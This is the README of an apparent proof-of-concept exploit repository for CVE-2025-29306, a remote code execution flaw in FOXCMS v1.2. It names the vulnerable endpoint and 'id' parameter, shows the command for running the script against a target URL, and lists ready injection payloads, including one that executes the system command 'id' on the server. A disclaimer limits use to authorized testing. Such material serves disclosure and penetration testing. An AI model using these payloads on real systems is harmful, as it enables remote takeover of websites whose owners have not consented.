
This repository contains a Python-based PoC for a Remote Code Execution (RCE) vulnerability affecting FOXCMS v1.2, a Chinese open-source content management system.
CVE-ID: CVE-2025-29306
Affects: FOXCMS v1.2
Type: Service Parameter Injection → Code Execution
FOXCMS suffers from an insecure parameter parsing mechanism in the id parameter on the /images/index.html endpoint. This allows payload injection using ${@print()} expressions, leading to PHP code execution.
requests librarypip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
# 🔐 Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.
Author
Inok009